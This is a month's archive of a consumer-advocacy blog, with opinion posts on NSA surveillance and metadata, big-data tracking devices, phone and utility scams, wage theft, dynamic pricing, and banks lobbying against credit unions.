Previous month:
July 2013
Next month:
September 2013

19 posts from August 2013

Are You Walking Blindly In The 'Big Data' Revolution?

There is a good article in the BBC News website about the trends and impacts of technology -- namely about how "big data" is transforming the entire planet. "Big data" refers to information companies and governments collect about consumers. They collect this information from a variety of sources:

"... not only from posts to social media sites, mobile signals and purchase transactions but increasingly from sensors on objects from lamp-posts to skyscrapers...In Birmingham, lamp-posts are being fitted with sensors that can transmit information about cloud cover to offer hyper-local weather forecasting. In Norway, more than 40,000 bus stops are tweeting, allowing passengers to leave messages about their experiences... At MIT's Senseable City Lab, 5,000 pieces of rubbish in Seattle were geo-tagged and tracked around the country for three months to find out whether recycling was really efficient..."

You've probably noticed video surveillance cameras on street lights across the country. That's another source. This blog has reported about many other sources:

All of these types of devices will be used more and more in what people call a "smart city:"

"The core functionality of a smart city requires a vast amount data to be collected on every aspect of our lives every minute of every day. The question is how does that data get used? And it doesn't require a huge amount of imagination to see how it could be used to monitor people... the control of information is being taken away from citizens, and companies providing services are rushing to find ways of generating revenue from the data they hold. The danger is... individuals will not be able to control the ways they are monitored or what happens to the information, which is exactly the opposite of how it should be."

It seems to me, you can distill all of this into a single issue about consumers:

"... People have clicked "yes" to those terms but don't realise that everything you share can be collected. We could be walking blindly into a 24/7 surveillance society..."

We have traded privacy for convenience.

Are you walking blindly? Are you willing to continue trading convenience for privacy? Are you willing to question online processes, privacy disclosures, and website terms of usage? Are you willing to push back and say: enough? Are you willing to demand that your elected officials place consumer protections before privacy abuses happen, and not minor, ineffective protections afterwards? Are you willing to support any of the consumer advocacy groups that look out for your privacy?


Wage Abuse: A New I've Been Mugged Topic

It seems that an increasing number of employees (and independent contractors, also known as "freelancers") aren't paid the wages they've earned, or receive a portion of the wages they've earned. And, in some instances employers haven't deposited contributions to employee retirement plans, neither in full nor in a timely fashion.

So, I have added a new topic in the tag cloud in the near right column for this content. The "Wage Abuse" topic includes content where we will explore the various ways employers abuse employees or steal from employees regarding wages. The issues cover employers in both the public and private sectors. The news items are often reported by news media, consumer advocates, or labor agencies (federal, state).

I hope that you like the new category.


More Consequences From Broad NSA Surveillance: Germany Government Technologists Consider Windows 8 Too Dangerous

NSA Inside logo Apparently, surveillance software code by the National Security Agency (NSA) is in the new version of Windows 8. BGR reported:

"German publication Zeit Online has obtained leaked documents that purportedly show that IT experts within the German government believe that Windows 8 contains back doors that the NSA could use to remotely control any computers that have it installed.... Zeit says that German researchers fear that there will be “simply no way to tell what exactly Microsoft does to their system through remote updates..."

From prior news reports we learned that during the last decade Microsoft Windows 95, Windows 98, Windows NT4 and Windows2000 all contained NSA code. Now, we learn that Windows 8 also includes NSA code. The Android OS includes NSA code, while, according to Apple, its operating system software and products do not contain NSA code. (Let's hope that is true. The U.S. does have a secret court, secret laws, and secret processes -- so Apple may be prevented from admitting what is in their OS.)

If the report about Windows 8 is true, this may cast a different light on the departure of Microsoft CEO Steve Ballmer. I see several possible scenarios:

  1. Microsoft approved the NSA code with Ballmer involved in the decision
  2. Microsoft approved the NSA code without Ballmer involved in the decision
  3. After fighting the NSA surveillance program, Microsoft was forced to include NSA code in its products
  4. Microsoft included the NSA code without fighting the government surveillance program

It's not good if Ballmer approved the decision to include NSA code in Windows 8, and it's not good if he wasn't involved -- with some junior-level engineer making instead such a pivotal decision. It's not good if Microsoft never fought the inclusion of NSA code while being forced to comply. I'd like to believe that company executives could foresee a negative reaction, if and when customers realize that NSA is in the company's software and products.

Reportedly, Yahoo fought the government surveillance program and lost in 2007 or 2008. I am not a lawyer. Perhaps, some legal expert will weigh in here about whether the U.S. government can use the FISA Amendments Act (FAA; Adobe PDF) to force companies to comply with government surveillance programs. We have a secret court, secret laws, and secret processes. So, it is possible there is some secret law besides the FAA.

The embedded NSA code puts Microsoft products at a disadvantage versus Apple, since Apple products and operating system software do not include NSA code. And, the loss of business in Germany is not good news, as Microsoft struggles with lagging market share with smart phones, Microsoft Office faces stiffer competition, and Windows 8 sales lag as PC sales lag.

The situation makes me wonder how much money the NSA paid Microsoft to embed their code. I doubt that any payments to Microsoft equal or exceed lost company revenues. In fact, the Guardian UK reported on Friday that the NSA has already paid millions to several high-tech companies to cover the companies' compliance costs:

"A Yahoo spokesperson said: "Federal law requires the US government to reimburse providers for costs incurred to respond to compulsory legal process imposed by the government. We have requested reimbursement consistent with this law." Asked about the reimbursement of costs relating to compliance with FISA court certifications, Facebook responded by saying it had "never received any compensation in connection with responding to a government data request." Google did not answer any of the specific questions put to it, and provided only a general statement denying it had joined Prism or any other surveillance program... Microsoft declined to give a response on the record."

If the BGR and Zeit Online news reports are accurate, then the NSA code is not benign, contrary to what the NSA said in prior news reports about its code in the Android operating system software. This is huge news also because it indicates a clear intent by organizations in other countries to stop buying future Microsoft products, which they view as compromised by NSA surveillance.

Prior news reports indicated a review of the Safe Harbor agreement that allows U.S. companies to sell products and services in the European Union. If amended, that would greatly restrict Internet and high-tech companies' sales in Europe. That consequence is in addition to warnings by experts that the massive NSA government spying program could cost U.S.-based cloud-services vendors $35 billion in lost revenues. In simpler terms:

Lost revenues by U.S. high-tech companies = lost American jobs = lost tax revenues to U.S. federal, state, and local governments

Consequences just got real. For everyone. Not just for Microsoft.

A tiny bit of somewhat good news in the BGR report:

"... the researchers say that they’ll still be able to use Windows 7 securely “until 2020..." "

That gives the U.S. and its high-tech firms a small window to restore customers' confidence in their products and services with embedded NSA surveillance code, plus embedded code from any other U.S. government agencies. Ballmer may need to leave far sooner than 12 months. Maybe some more NSA document disclosures will shed light on this.

Do U.S. government officials really believe that there would not be any negative (unintended) consequences for its extensive surveillance programs with NSA code embedded in commercial software products and services? Do U.S. government officials really believe that there would not be any negative consequences for mass surveillance of our European allies? It has undermined our allies' trust in the USA. It has undermined their trust in USA-made products and services.

The American people need to have a full debate about this. Do taxpayers (and voters) want their government spending money this way in surveillance programs and software code? Do you find it acceptable that this code is done in secret? Do you find acceptable the projected revenue losses by American high-tech companies? Are the likely job losses acceptable, too? What other high-tech companies will be affected next?


Fraudsters Target Residents In Several States With Utility Scam

Earlier this month, Rhode Island residents were warned about a utility scam where fraudsters try to trick them into disclosing sensitive bank account information. The fraudsters pretend to be representatives from your local utility provider; in Rhode Island, National Grid.

During the phone call, the fraudsters claim that customer's account is past due, and that their electric or gas utilities will be shut off unless they pay immediately, by providing their bank account and payment information over the phone. Besides Rhode Island, the fraudsters have targeted consumers in Pennsylvania, Maryland, Ohio, Florida, and Alabama. In Florida, the fraudsters demanded payment via the Green Dot prepaid card.

National Grid does not contact Rhode Island customers by phone about past due account notices. If you receive a phone call with this scam, or were affected:

  • Do not give out bank account and payment information over the phone,
  • Do not wire money to people you do not know,
  • Do not give prepaid cards to people you do not know,
  • Report the scam to the Federal Trade Commission (FTC), and
  • Contact directly your utility provider directly about your account status.

When A Movie Ticket Costs $50 -- And That Doesn't Include Soda

[Editor's Note: today's post is by guest author R. Michelle Green, the Principal for her company, Client Solutions. She is a combination geek girl, personal organizer, and career coach. Michelle helps others improve their use of technology in their personal or professional life. Today, she discusses the trend by more companies to charge for their products and services with dynamic pricing techniques.]

By R. Michelle Green

I find great joy in large dark rooms experiencing a well-told story on a big screen. Knowing this, I tend to buy my movie tickets in bulk (AAA pays for itself chez moi...) So I’ve been insulated from the shift in movie pricing these last 2-5 years. Sure I noticed that some theaters had stepped beyond time of day pricing, or that my coupons are no good during the movie’s first week. Some theaters charge more for special events, like the Metropolitan Opera in HD, the 50th anniversary of Lawrence of Arabia, or ST:NG’s 25th anniversary. But a recent conversation on utility pricing struck a chord in me, having just read an article about the $50 movie ticket.

The Hell you say? Oh it’s already happened, a trial balloon less than two weeks ago. In five US cities, $50 bought a ticket to an advance showing of World War Z, a poster, a digital download of the movie, and (drum roll please) – a small popcorn. (jeez Louise, not even a medium???) At a USC panel, Lucas and Spielberg recently said they expect $100 tickets in the near future; that art house and ‘personal’ films could be priced at $7 while the big event movie on the first night might be $100. China has a tiered system of government controlled prices for movies – Iron Man 3 sold out at as much as $25 in some locations. This isn’t a new thought, particularly for economists.

Once you start looking, you see ala carte pricing everywhere. Even some of the major airlines now charge not for picking the desirable seat, but for exercising the right to choose one at all (even the middle seat). Spirit airlines has gone plum crazy IMNSVHO – advertising incredibly cheap fares ($7-25) but then charging you for your carry-on (a gendered price burden, as a women’s purse would be considered the first or free bag). Oh, and don’t procrastinate – they’ll charge you $45 extra if you decide you want a carry on at the gate, and not at the time of online ticket purchase. Airline ancillary revenue is the cash cow now, not flight pricing.

A restaurant I frequent has new management wringing every penny out of the process. Ever gotten take out and decided to sit down and eat it there? They’ll charge you an additional fee to put it on a plate. In a party of three and want to use three credit cards? Not so fast: costs extra to use more than 2 cards.

So what does ala carte pricing for movies look like in practice? Do you know the movie’s title, time of day, day of week, day of 1st showing, version, format? And where are you, how old are you, do you want concierge service? But caveat emptor, right? If the price structure and rules are visible, available before sale, clear, and comprehensible, do I have the right to bitch? I’m here 5 minutes before the movie begins. I’m psyched for the show, my money’s in hand. NOW I learn that noon isn’t matinee pricing anymore AND this is the 3D presentation AND it’s in the deluxe room (where you have to choose a seat and the ushers are also waitstaff). So now my expected $7.50 ticket is maybe $15. At least I knew what the price could have been, and knew what variables could lower the price. The woman in front of me just paid the $15…

Dinner and a movie? Be sure to allow 15 minutes to find and read your menu’s fine print...


Washington Post: NSA Violated Citizens' Privacy Repeatedly

National Security Agency logo Like most people, you have probably been away on vacation or at the beach enjoying the warm summer weather. Last week, the Washington Post reported some very interesting and troubling news.

The newspaper reported about an internal audit by the National Security Agency (NSA), where the NSA violated consumers' privacy thousands of times while performing surveillance of foreign targets in the United States. The audit covered the period from April 2011 through March 2012. The newspaper obtained the document from former NSA contractor Edward Snowden.

In plain English, this means that the NSA collected data about U.S. citizens it shouldn't have collected data about. That is a violation of the Fourth Amendment of the U.S. Constitution.

Some of the violations were serious. Defenders of the NSA were quick to point out that many of the violations were supposedly minor typographic errors:

"In one instance, the NSA decided that it need not report the unintended surveillance of Americans. A notable example in 2008 was the interception of a “large number” of calls placed from Washington when a programming error confused the U.S. area code 202 for 20, the international dialing code for Egypt... In another case, the Foreign Intelligence Surveillance Court, which has authority over some NSA operations, did not learn about a new collection method until it had been in operation for many months. The court ruled it unconstitutional."

When defenders of the NSA claim that typographical errors are minor, to me that is dishonest. The Fourth Amendment of the Constitution is the issue here, however it was violated. Data was collected about U.S. citizens that should not have been collected. Period. You don't get rewards for good intentions..., or oops we didn't really mean to collect that. All violations are intrusive.

This highlights the problem when there are secret courts, secret laws, secret operations, and either insufficient or incompetent oversight by the U.S. Congress. Privacy is breached, the violations never corrected, and things get a lot worse. A related Washington Post article about the FISA Court reported:

"The chief judge of the Foreign Intelligence Surveillance Court said the court lacks the tools to independently verify how often the government’s surveillance breaks the court’s rules that aim to protect Americans’ privacy. Without taking drastic steps, it also cannot check the veracity of the government’s assertions that the violations its staff members report are unintentional mistakes."

So, things are worse. I cannot over-emphasize the importance for citizens -- voters -- to read the Washington Post article with comments by U.S. District Judge Reggie B. Walton. Kudos to the Washington Post for this excellent reporting.

The Washington Post website contains several detail articles, including a redacted executive summary of the internal NSA audit. And based on the training the NSA gives its analysts, the explanations and spy language intentionally downplay, obfuscate the truth, and mislead Congress about the privacy violations:

"This document tells NSA analysts how to explain their targeting decisions without giving "extraneous information" to "our FAA overseers." Analysts are specifically warned that they "MUST NOT" provide the evidence on which they base their "reasonable articulable suspicion" that a target will produce valid foreign intelligence. They are also forbidden to disclose the "selectors," or search terms, they plan to use. In examples that draw on actual searches, the document shows how to strip out details and substitute generic descriptions."

Geez. Is it so hard to simply tell the truth? At this point, my trust level for the NSA is zero. Whatever trust I had in the FISA Court is declining fast.

When I think back over the last 10 weeks, it seems like one lie after another, followed by one disclosure after another. The CrunchGov blog summed it up well the recent history:

"It’s just metadata. It’s just metadata on all phone calls. No they can’t call up your emails. Well, yes, XKeyscore is real, and you should be happy we have it. No, there have been zero privacy abuses. Well, fine, in one 12-month period ending in 2012 there were 2,776, but that’s just proof of oversight and none were willful! Wrong. And no, there has been no harm to individuals. We should worry more about terrorism."

No harm? We have heard that the NSA shares the data it has collected with other government agencies, who then use it for their own investigations without disclosing where they got it from. This makes it difficult (or impossible) for people to defend themselves in court proceedings. That is harm. We've heard about one e-mail service shutting down, and one blog shutting down so far; in addition to forecasted revenue losses in the cloud industry. Lost revenue equals lost jobs. That harm is spreading.

So, not only do we have a secret court, secret laws, and secret operations, but the court that is supposed to oversee all of this doesn't have the resources to do the job. Hence, it cannot verify the allegations about the privacy violations. The privacy violations could be a lot worse, and/or more frequent. And, the U.S. Congress seems okay with this mess.

So, we essentially have big government spying run a muck. The acronym FUBAR comes immediately to my mind. If this bothers you (and I sincerely hope that it does), write to your elected officials today.


Credit Unions Outperform Banks On Customer Loyalty, And Banks Lobby To End Credit Unions' Tax-Exempt Status

The Bankrate Banking blog reported the results from a recent survey about customer loyalty:

"According to the 2013-2014 National Member and Nonmember Survey from the Credit Union National Association, 57 percent of credit union members indicate they are extremely likely to recommend their credit union to friends. In contrast, just 40 percent of members who also use banks say they're equally as likely to recommend that institution to friends."

A 2012 survey found that 11% of customers were ready to leave their bank. To improve their performance, you'd think that banks would focus on better customer service, and cut costs to improve profitability. The big banks have focused on lobbying legislators in Washington to end the tax-exempt status of credit unions, which are non-profits:

"... Frank Keating, president of the American Bankers Association (ABA) wrote, "Many tax-exempt credit unions have morphed from serving 'people of small means' to become full-service, financially sophisticated institutions. The time has come to abolish this exemption." "

Another claim the banking industry likes to make is that repealing the credit unions' tax-exemption would create a level playing field. Earlier this year, the American Banking Association trade group released a flyer (Adobe PDF) which claimed:

"Today credit unions are a $1 trillion industry that pays no income tax. That’s nearly $2 BILLION every year that could help shrink the federal deficit. Now, credit unions want even more perks. It’s time to end credit unions’ indefensible and outdated special treatment. Enough is enough."

I agree. Enough is enough. And, enough with the spin and misleading statements. Let's start with some facts from the U.S. Statistical Abstract:

  • The average bank is about 14 times larger than the average credit union. In 2010, the average bank had $1,739.7 billion (or $1.7 trillion) in assets while the average credit union had $124.6 billion in assets.
  • Banks still control a whopping 94% of the market, based on assets. In 2010, FDIC-insured banks (commercial and savings) had over $13.3 trillion in assets, compared to $914 billion in assets at credit unions (federal- and state-insured).
  • Banks are far bigger with more branch offices and ATM retail booths. Also in 2010, the 7,657 FDIC-insured banks (commercial banks and savings institutions) had 95,527 offices (main office and branches). That is about 12 offices per institution. In the same year, there were 7,339 credit unions; most with a couple offices (that rely on others' ATM networks to service their members).
  • In 1990, the average bank was about 20 times larger than the average credit union. In 1990, the average bank had $306.6 billion in assets while the average credit union had $15 billion in assets.
  • From 1990 to 2010, the number of banks decreased (e.g., consolidations, failures) by about 50%, the number of offices increased by 45%, and assets increased 186%. So, the big banks got a lot bigger.
  • During the same period, the number of credit unions decreased (e.g., consolidations, failures) by about 43%, and assets increased by 361%. So, small organizations did get bigger.
  • In 1990, banks controlled about 96% of the market; based on assets. So, credit unions have captured 2% of the market in 20 years. That is miniscule annual growth in market share.

Some additional facts worth noting:

The trade group representing credit unions has completed its own analysis which totally debunks the level playing field claim by banks. Read this 2011 report: Commercial Banks and Credit Unions: Facts, Fallacies, and Recent Trends:

  • The claims by bankers imply that credit unions have captured a larger share of the market. This is false. In 1992, credit unions had 6% of the market -- the same share as in 2010.
  • In 2011, half of credit unions had less than $19 million in assets while less than 2% of commercial banks were this small. During the same period, two-thirds of banks had $100 million or more in assets, while only 20% of credit unions were this big.
  • The claims by bankers that credit unions don't paying their fair share of taxes is misleading and dishonest. Many banks use the SubS tax status to pay less taxes. According to CUNA, the number of banks using the SubS tax status has grown from 6% in 1997 to 31% in 2011. Both small and big banks use this tax dodge. Again in 2011, 61 banks with $1 billion or more in assets used the SubS lower-tax status, which was originally created for small businesses. It would seem that the banks are gaming the system tax wise.

What's really going on here? I began to wonder why an industry that controls 94% of the market would complain about its competition.

As I see it, this lobbying by banks is another slick attempt to focus attention away from themeselves and to limit consumer freedoms and banking choices. By limiting or eliminating choices (e.g., credit unions), banks reduce competition that keeps banking prices down. Without credit unions, it would be easier for banks to raise prices (e.g., fees, loan interest rates, decrease savings interest rates). Consumers would not have an option to move their money to from banks. I can think of no other reason why an industry would complain about competition that has only 6% of the market.

Remember, raising prices was what the banks wanted to do in 2011, but couldn't when consumers rejected higher monthly checking and debit fees proposed by the Bank of America and other big banks. Raising banking prices has several benefits for banks:

  1. Increases banks' revenues and profits
  2. Encourages some current account-holders to move to underbanked status: a checking or a savings account, but not both
  3. Encourages some current account-holders to move to unbanked status: neither a checking nor a savings account
  4. Allows banks to service both underbanked and unbanked customers with highly-profitable prepaid cards, instead of with traditional checking and savings accounts. Prepaid cards aren't as tightly regulated as debit cards, credit cards, checking accounts, and savings accounts. Prepaid cards have fewer or no disclosure requirements and few to no limits on the number or amount of fees the banks can charge. Prepaid card users have greater liability should the bank that issued their prepaid card fail.

In 2011, about 8% of U.S. households were unbanked and 20% were underbanked. The average prepaid card charges about $300 per year in basic fees. That's a huge revenue source for banks. Do you want to pay $300 per year, or more, in banking fees? I doubt it. I don't.

This blog discussed the long list of fees charged on many prepaid payroll cards. The goal should be to decrease unbanked and underbanked households. The St. Louis Federal Reserve said it well in 2010:

"Encouraging the unbanked to handle payments through the financial mainstream is important for a number of reasons. Having a checking and savings account is an important first step in establishing that the consumer has the financial acumen to apply for credit for a car or home... the key advantage to consumers having bank accounts is avoiding costly alternative financial services and enabling families to build and protect their wealth. Unbanked consumers spend approximately 2.5 to 3 percent of a government benefits check and between 4 percent and 5 percent of payroll check just to cash them. Additional dollars are spent to purchase money orders to pay routine monthly expenses. When you consider the cost for cashing a bi-weekly payroll check and buying about six money orders each month, a household with a net income of $20,000 may pay as much as $1,200 annually for alternative service fees—substantially more than the expense of a monthly checking account fee."

So, traditional checking and savings accounts are ways for consumers (e.g., the poor and lower middle-income people) to move up the economic ladder in society to achieve the American dream. If one wants the poor and middle-income classes to succeed, one should encourage them to open traditional checking and savings accounts with the lowest-cost financial products possible, usually available at credit unions.

Without credit unions (or with severly hampered credit unions), a rise in banking prices by banks would likely result and cost consumers dearly. The Los Angeles Times reported:

"The tax exemption is crucial to credit unions, which by law can't raise capital through public stock offerings the way that banks can, said Fred R. Becker Jr., president of the National Assn. of Federal Credit Unions, a trade group with about 3,800 federally chartered members... A 2012 economic study commissioned by the trade group found that removing the tax exemption would cost consumers about $10 billion a year through higher fees and interest rates on loans, as well as lower interest rates on savings."

The Los Angeles Times article also provided some good background information:

"Under a 1934 law, Congress exempted credit unions from federal income taxes as long as they were nonprofit businesses, organized without capital stock and operated for the benefit of their members. For decades, most credit unions were small operations, usually serving employees of individual businesses and government agencies. The industry has grown significantly since the 2008 financial crisis, boosted by outrage over Bank of America's 2011 plan to impose a $5 monthly fee for debit card use."

So, the big banks have only themselves to blame for the rise in credit unions. I think that it is important to remember the history of banks and credit unions described in this Federal Credit Union handbook (Adobe PDF):

"In the early twentieth century, credit needs of the urban working classes in the United States were largely neglected by established financial institutions. For the most part, the average worker had nowhere to turn except to the usurious money lenders of the day. This growing dependency complicated the economic life of the average consumer and gave rise to the development and formation of a cooperative credit system in the United States, an idea originating in Europe and imported to North America in 1900. In 1908, the first legally chartered cooperative credit society was established in Manchester, New Hampshire by a special act of the state’s legislature. The following year, the first complete credit union act, the Massachusetts Credit Union Act, became law in Massachusetts. By 1933, enactment of state laws permitting formation of credit unions had been largely accomplished. In 1934, the Federal Credit Union Act was signed into law..."

A reminder: usurious = very high or unlimited interest rates. So, a world without credit unions would eliminate the need for the Credit Union Act. It would also eliminate several freedoms citizens have, including the right to gather as a group and form a credit union. It would also set conditions for a return to the high interest-rate times of the 1800's. Do you want to return to banking practices of the 1800s? I doubt it. I don't.

What to do next. First, contact your elected officials and tell them what you think of the banks' lobbying against the tax-exempt status of credit unions. Second, move your money to a local, community bank or to a credit union. Third, join the Don't Tax My Credit Union movement.


Video: Wet Wipes For Incontinent Bankers

Earlier this wek, the Keiser Report posted this Yourtube video with a comparison, which I distilled into the following formula:

Wet wipes + food waste fats = giant fatberg in London sewer = fraud + Libor scandal + TBTF + derivatives + unethical bankers

Well, Western bankers certainly deserve this criticism. You can read about the reasons why in the banking section of this blog. While this comparison is pretty funny, what isn't funny is that a viewer or reader probably can't rely on RT (Russia Today) News to deliver consistently balanced news. Will Russia Today criticize, when appropriate, the Kremlin? Will it present news about harsh anti-gay laws in Russia? Will it report instances of persistent and violent racism in Russia? Will it report news about the assissinaton of journalists? I highly doubt it.


What To Do When You Receive Spam Phone Calls

A few weekends ago, a friend posted this message on a social networking website:

"So, at 8:30 this morning, I'm sound asleep, I get a phone call from 214-814-5094, and it's this guy with a *heavy* accent tells me he's calling from the State Attorneys office and there are "three judgments" against me. I responded with something rude, it's 8:30, I was asleep, its Saturday, he says, "Please don't use that language with me, ma'am!" and I said, "You woke me up, get used to it!" And he asked for my attorney's name and I asked, "What state? What attorney? I doubt the State Attorney is calling me on a holiday weekend, and seriously doubt he's using a call center in India!" Then I went and Googled the number - and there are PAGES of complaints about the number!"

My friend was wise and rightly suspicious of this caller. My advice:

  • Hang up on callers like this. Don't engage them.
  • Don't disclose any personal information, even if it seems like the caller knows data about you.
  • Assuming your phone number is on the Do Not Call list, file a complaint with both your phone company and the Federal Communications Commission (FCC). My friend filed a complaint.
  • If your phone number is not on the Do Not Call list, consider adding it.

Contractor To Pay $600,000 To Settle Wage Theft Investigation In New York City

Last week, the office of the New York State Attorney General announced the results of an investigation into Masonry Services, Inc. (MSI), a masonry contractor. MSI has agreed to pay $600,000 for underpaying workers on an affordable housing project within New York City.

MSI owners James S. Herrera and Jaime T. Herrera, have agreed to pay $600,000 for underpaying masonry workers on the St. Marks Project, a publicly funded affordable housing project for seniors in the Brownsville section of the borough of Brooklyn. The payment includes $575,000 in back wages plus $25,000 in costs. New York State Attorney General (AG) Eric T. Schneiderman said:

“My office will continue to pursue contractors who illegally underpay workers, whether it’s on a small scale or in a larger settlement like this one... Contractors who work on publicly-funded affordable housing projects must comply with all applicable laws, plain and simple. MSI will be held accountable for failing to meet its obligations..."

The investigation focused on the requirement that workers must be paid the prevailing wage. The goal of prevailing wage laws is to ensure that government contractors pay wages that are comparable to the local rates for a given trade. According to the announcement:

"The law requires an hourly rate for construction work performed for public agencies that is well above the state and federal minimum wage of $7.25 per hour, along with certain additional benefits. Between June 2009 and July 2010, the masonry workers on the St. Marks Project were paid between $8 and $23 an hour– well below the applicable prevailing wage rates – and were not paid overtime despite regularly working more than 40 hours a week."

Besides the payment, the agreement also requires MSI to pay for services to independently monitor MSI’s labor practices on private and public construction projects for three years, with unannounced on-site inspections. If violations are found, MSI will be barred for five years from working on on New York State public works projects.

Robert Bonanza, business manager of the Mason Tenders District Council, said:

“For too long, too many contractors have operated in open defiance of the prevailing wage laws, which protect workers from unscrupulous employers, whose only goal is to profit at the expense of honest hard-working New Yorkers. On behalf of the members of the Mason Tenders District Council, I want to thank Attorney General Schneiderman and his office for their role in bringing MSI and its owners to justice."

Learn more about the Mason Tenders District Council of New York City and Long Island.


London Company Performs A Market Test Using Recycle Bins That Track Smartphones

Advertisers and companies are getting more aggressive about tracking consumers by using a variety of technologies. An earlier blog post discussed a test in Brazil with grocery store shopping carts outfitted with interactive touch-screen tablet computers. Today's blog post discusses interactive recycle bins that tracks the smart phones of consumers passing by.

Recycle bins tracking consumers? Really?

Yes. Recycle bins. During the weekend, ComputerWorld reported a market test in London by advertisers using recycle bins to display interactive ads by tracking the smart phones of consumers that pass or walk by the bins:

"The bins display advertising that's customized for each phone tracked... 12 of these bins in London's Square Mile business district were "upgraded" with "Renew ORB" devices, which are designed by a London-based company called Presence Aware to seek out smartphone MAC addresses to identify individual phones. The tracking system determines how close the phone is to the bin, how fast the user is moving, what direction the user is heading and what brand the phone is."

The interactive recycle bins, called "Renew Pods." As you walk by a bin, it serves up an interactive ad based upon the direction you are walking, date, time, and any interactive ads you have seen previously. If you walk by several Renew Pods, the company can track -- based upon the unique identifier broadcasted by your smart phone -- your travel route and collect more data about all of the ads you've seen, and stores you have passed. Supposedly, the foot traffic is summarized and made anonymous. All of this tracking provides advertisers, the retail stores participating in the market test, and the advertising network with a lot more information about the consumers who walked or passed by:

  • Which ads were displayed
  • Which ads were displayed repeatedly
  • Direction of walkers/passersby
  • Which bins displayed which ads

Consumers walking or passing by a bin didn't have to enter any of the participating retail stores to see the ads on the sides of the bins. Consumers only had to pass a bin.

Some examples illustrate where the technology and advertising is headed. If you walk past a bin during a Spring day towards a shoe store participating in the Renew Pods program, you might see an interactive ad on a recycle bin with Summer shoes for sale at that store. If you walk past a bin during the afternoon towards a participating restaurant, you might see an interactive ad about dinner menu items at that restaurant. If you walked past several bins while visiting several dress stores, the bins might display interactive ads about dresses and accessories.

Merely the act of walking past an interactive recycle bin triggers the interactive ads. You didn't have to enter any of the participating retail stores to be tracked and see ad on the sides of bins.

Creepy, eh?

Science-fiction fans will note that this is one step removed from the "Minority Report film, where malls display interactive, personalized ads based upon scanning your eyes.

The problems with the Renew Pod program should be obvious. Consumers don't have a choice. Consumers walking by are automatically included, and cannot opt out of the program/tracking. Moreover, the program does not provide consumers with any notice -- privacy or terms-of-use policies -- about the program, data collected, extent of the tracking, and whom the data is shared with. Basically, consumers can only trust the CEO's claims about your data remaining anonymous.

In the end, common sense ruled and the city of London stopped the program:

"A spokesman for the City of London Corporation said: "Irrespective of what's technically possible, anything that happens like this on the streets needs to be done carefully, with the backing of an informed public." "

That should be the goal for any company or executives looking to develop a similar program. Keep the public informed. The program should be opt-in, by first asking consumers if they want to participate. And, the appropriate policies (e.g., privacy and terms of use) must be displayed in order for consumers to make an informed choice to participate or not.


Employees Share Their Experiences With Wage Theft

Many employees don't immediately recognize wage theft in the workplace. Perhaps, you (e.g., hourly workers) were asked to work overtime without being paid. Or, maybe you were asked to work off the books. Or, maybe a paycheck or business travel reimbursement check from your employer bounced.

The folks over at Working America asked consumers to share their wage theft stories. Here are a few:

"Once my paycheck bounced because the owner of a security business in California bought a Porsche with the company payroll. They froze my accounts. Checks bounced."

"I had gotten my paycheck on a debit card from work. About a month ago I lost the card – it still had 160 dollars on it. I sent in for a new one i got one without the money."

"When my husband worked for a supermarket chain at close to minimum wage, it was mandated that he punch out at “quitting time” and then go to the parking lot to round up the shopping carts until every last one was collected – even those for shoppers rung up after closing time."

"As a waitress we had to stay after closing and clean for free. No wages, not even the minimum wage, for waitresses.Vacuuming, washing tables, chairs, sweeping, filling salt and pepper shakers and condiments. As a single mom, I put up with it to keep my job. They knew I needed to work."

To learn more and read more stories by employees, visit the Main Street blog by Working America. You can also read employees' stories on BuzzFeed.


What Is Metadata? Why Is It Important?

You have probably heard the term "metadata" mentioned frequently in reports about government surveillance programs. Or, maybe you have been involved in a class-action lawsuit where a company was alleged to have abused the metadata of its customers.

One way to understand what metadata is to look at examples for different types of data. First, metadata about your (cellphone and land-line) telephone calls includes:

  • The phone number you called (reportedly, the name is not collected)
  • When you made the phone call:  date and time
  • Phone number of who called you
  • When you received that call: date and time
  • Your phone number
  • Your phone information (UDID if a mobile device)
  • How long you talked: duration of the call in minutes
  • Where you made/received the phone call (e.g., geo-location of your mobile device)

Mobile device includes cell phones, smart phones, and tablets. Metadata does not include the contents of your telephone calls or conversations: what you said during your phone conversation. Courts have ruled since 1979 that it is legal to collect telephone metadata. They can learn a lot by analyzing the patterns of your phone calls: who, when, and where you make/receive certain calls. They don't have to listen to your actual phone conversations to learn a lot. Analyzing the metadata of your phone calls tells them almost everything they need or want to know.

Supposedly, agencies need a court order to listen to your phone conversations, but the NSA PRISM surveillance program has already been listening to your video conversations via Skype since early in 2011, including conversations where a person at one end uses a conventional telephone.

Second, metadata about your text messages includes:

  • The phone number you sent a text message to
  • When you sent the text message: date and time
  • The phone number of who sent a text message to you
  • When you received a text message: date and time
  • Your phone number
  • Your device information (UDID if a mobile device)
  • Where you sent/received the text message (e.g., geo-location of your mobile device)

Metadata does not include the contents of your text message: what you typed. Remember, your telephone company compiles a detailed record of when and where you are near certain cell towers, because your mobile device constantly seeks the nearest cell tower to make/receive calls or check for voice-mail messages.

Third, metadata about your e-mail messages includes:

  • The e-mail address you sent an e-mail message to
  • When you sent the e-mail message: date and time
  • The e-mail address of somebody who sent an e-mail message to you
  • When you received the e-mail message: date and time
  • Your e-mail address
  • Your device information (UDID if a mobile device)
  • Where you sent/received the e-mail message (e.g., geo-location of your mobile device)

Metadata does not include the contents of your e-mail message: what you typed and the contents of any attachments. This gives you an idea of the extent of the bulk e-mail metadata collection by the NSA, in addition to the bulk phone-call metadata collection -- whether directly, through an intermediary (e.g., your phone company, ISP, or e-mail service), or through the XKeyscore spy program.

NBC News reported this about the legality of collecting your e-mail metadata:

"... emails sent and stored on services such as Gmail seem to fall in between these two legal categories. Is the email content, like a call conversation or a letter sealed in an envelope? Or it is data freely given to a third party? Congress tried to split that baby with the Stored Communications Act back in 1986... it created some situations under which law enforcement officials can peek at any data given to third parties, including email, without needing to show probable cause.This means law enforcement officials are sometimes not required to ask before they barge into your virtual home."

Fourth, metadata about your photographs includes:

  • When you took the photograph: date and time
  • Your device information (e.g., brand, model, UDID if a mobile device)
  • The size of the photograph (e.g., bytes, width in pixels, height in pixels)
  • The format or file type (e.g., *.jpg, *.png)
  • The resolution of the photograph (e.g., pixels per inch)
  • Your information (e.g., your name, e-mail address or user name if the photo is uploaded to a social networking website)
  • Your camera or device information (e.g., make, model, F-stop, exposure, flash mode, zoom setting, lens maker, lens model, serial number, EXIF version)
  • When you edited the photograph: date and time
  • Where you took the photograph (e.g., the geo-location, if you used a mobile device)
  • Any title, comments, and/or caption text you added to the photograph
  • Persons in your photo, if you tagged the photo with names after uploading it to a social networking website

